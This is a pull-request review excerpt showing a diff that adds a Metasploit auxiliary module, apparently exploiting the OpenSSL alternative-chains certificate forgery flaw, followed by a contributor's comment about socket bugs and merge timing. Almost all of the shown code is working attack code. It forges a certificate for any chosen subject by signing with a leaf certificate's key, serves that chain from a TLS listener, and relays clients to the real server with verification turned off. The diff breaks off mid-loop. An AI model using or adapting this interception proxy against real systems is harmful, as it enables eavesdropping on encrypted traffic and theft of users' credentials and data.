modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb

```diff
@@ -0,0 +1,208 @@
+    inter_ca_cert.public_key = inter_ca_key.public_key
+    inter_ca_cert.serial = 0
+    inter_ca_cert.subject = inter_ca_name
+    inter_ca_cert.version = 2
+    extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, inter_ca_cert)
+    inter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
+    inter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
+    inter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
+    inter_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)
+
+    subinter_ca_cert = OpenSSL::X509::Certificate.new(File.read(datastore['CACERT']))
+    subinter_ca_cert.issuer = inter_ca_name
+    subinter_ca_cert.sign(inter_ca_key, OpenSSL::Digest::SHA1.new)
+    leaf_key = OpenSSL::PKey::RSA.new(File.read(datastore['KEY']), datastore['PASSPHRASE'])
+    leaf_cert = OpenSSL::X509::Certificate.new(File.read(datastore['CERT']))
+
+    fake_name = OpenSSL::X509::Name.parse(datastore['SUBJECT'])
+    fake_key = OpenSSL::PKey::RSA.new(2048)
+    fake_cert = OpenSSL::X509::Certificate.new
+    fake_cert.issuer = leaf_cert.subject
+    fake_cert.not_after = Time.now + 3600
+    fake_cert.not_before = Time.now
+    fake_cert.public_key = fake_key.public_key
+    fake_cert.serial = 0
+    fake_cert.subject = fake_name
+    fake_cert.version = 2
+    extension_factory = OpenSSL::X509::ExtensionFactory.new(leaf_cert, fake_cert)
+    fake_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
+    fake_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
+    fake_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
+    fake_cert.sign(leaf_key, OpenSSL::Digest::SHA1.new)
+
+    context = OpenSSL::SSL::SSLContext.new
+    context.cert = fake_cert
+    context.extra_chain_cert = [leaf_cert, subinter_ca_cert]
+    context.key = fake_key
+
+    tcp_server = TCPServer.new(local_host, local_port)
+    proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context)
+    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+
+    thread_num = 0
+
+    loop do
+      framework.threads.spawn("Thread #{thread_num += 1}", false, proxy.accept) do |client|
+        application_data = ''
+
+        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+
+        server = Rex::Socket::Tcp.create(
+          'PeerHost' => host,
+          'PeerPort' => port,
+          'SSL'      => true,
+          'SSLVerifyMode' => 'NONE',
+          'Context'  =>
+            {
+              'Msf'        => framework,
+              'MsfExploit' => self
+            })
+
+        print_status('Connected to %s:%d' % [host, port])
+
+        begin
+          loop do
+            readable, _, _ = IO.select([client, server])
```

Comment:
I'm having problems with Rex::Socket::TcpServer and I didn't have time to look into those yet. Let me know whether you prefer to merge these PRs now and I fix later or wait for me to add the fixes before merging.